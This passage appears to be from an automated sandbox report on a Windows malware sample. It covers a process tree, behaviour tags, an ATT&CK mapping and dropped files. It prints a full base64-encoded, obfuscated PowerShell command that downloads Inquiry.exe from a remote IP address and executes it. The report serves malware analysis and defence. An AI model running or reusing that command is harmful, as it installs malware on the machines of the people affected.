AagBaAGIAZQBQAEMAcQBqADUAOwANAAoADQAKAA0ACgANAAoAfQANAAoADQAKAA0ACgBjAGEAdABjAGgAewB9AA==
2⤵
- Process spawned unexpected child process
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
pOwersHEll -E ZgB1AG4AYwB0AGkAbwBuACAAcABXADkANAAyAEYAdABNAFoAaABLAGkAXwBIAFkAbQBrAFEAagA3AFEAOQBvAHEANAAgACgAIAAkAFcATwA5AHMARwB4AHEAYQBnAEIAXwAxAG4ASwBYAHQAXwBwAFcAXwAgACwAIAAkAHMAMgA4AHYARQBwAFYAbABuAGIAcAByAFAAXwBjADEAdQBkAFEAcwBjAEcAZwBFAFQAdgA2AEUASwAgACkADQAKAHsADQAKAA0ACgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoAA0ACgAkAFcATwA5AHMARwB4AHEAYQBnAEIAXwAxAG4ASwBYAHQAXwBwAFcAXwAgACwAIAAkAHMAMgA4AHYARQBwAFYAbABuAGIAcAByAFAAXwBjADEAdQBkAFEAcwBjAEcAZwBFAFQAdgA2AEUASwAgAA0ACgApAA0ACgA7AA0ACgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAcwAyADgAdgBFAHAAVgBsAG4AYgBwAHIAUABfAGMAMQB1AGQAUQBzAGMARwBnAEUAVAB2ADYARQBLACAAKQANAAoAOwANAAoADQAKAH0ADQAKAA0ACgB0AHIAeQB7AA0ACgANAAoADQAKAA0ACgANAAoADQAKAA0ACgANAAoADQAKACQAdQA4AGgAYwAyAHcAbwA3ADIAdgB1AGEAMQBXAEEAagBaAGIAZQBQAEMAcQBqADUAPQAkAGUAbgBWADoAdABFAE0AcAArACcAXABJAG4AcQB1AGkAcgB5AC4AZQB4AGUAJwA7AA0ACgBwAFcAOQA0ADIARgB0AE0AWgBoAEsAaQBfAEgAWQBtAGsAUQBqADcAUQA5AG8AcQA0ACAAJwBoAHQAdABwADoALwAvADEANQAxAC4AMQAwADYALgAyAC4AMQAwADMALwBJAG4AcQB1AGkAcgB5AC4AZQB4AGUAJwAgACQAdQA4AGgAYwAyAHcAbwA3ADIAdgB1AGEAMQBXAEEAagBaAGIAZQBQAEMAcQBqADUAOwANAAoADQAKAA0ACgANAAoAfQANAAoADQAKAA0ACgBjAGEAdABjAGgAewB9AA==
3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3800

C:\Users\Admin\AppData\Local\Temp\Inquiry.exe
"C:\Users\Admin\AppData\Local\Temp\Inquiry.exe"
4⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4700

C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe
"C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe"
5⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
PID:4732

C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe
"C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe"
6⤵
- NTFS ADS
- Executes dropped EXE
- Modifies control panel
- Sets desktop wallpaper using registry
- Drops autorun.inf file
- Suspicious use of AdjustPrivilegeToken
PID:4428

C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe
"C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe" 2 4428 95328
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4412

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Suspicious use of SetWindowsHookEx
- Modifies registry class
- Modifies Internet Explorer settings
- Modifies control panel
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Checks whether UAC is enabled
PID:4804

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:656

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
- Modifies registry class
- Checks whether UAC is enabled
PID:1844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Checks whether UAC is enabled
PID:2420

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Checks whether UAC is enabled
PID:4160

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Checks whether UAC is enabled
PID:5176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Checks whether UAC is enabled
PID:5260

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Exfiltration

Command and Control

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Inquiry.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Inquiry.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe

Download Submit
memory/4428-8-0x0000000000400000-0x0000000000620000-memory.dmp

Filesize
2.1MB

Download
memory/4428-11-0x0000000000400000-0x0000000000620000-memory.dmp

Filesize
2.1MB

Download
memory/4428-12-0x00000000025B0000-0x00000000026BC000-memory.dmp

Filesize
1.0MB

Download
memory/4428-13-0x00000000006B2000-0x00000000006B3000-memory.dmp

Filesize
4KB

Download
memory/4428-14-0x000000000B600000-0x000000000B602000-memory.dmp

Filesize
8KB

Download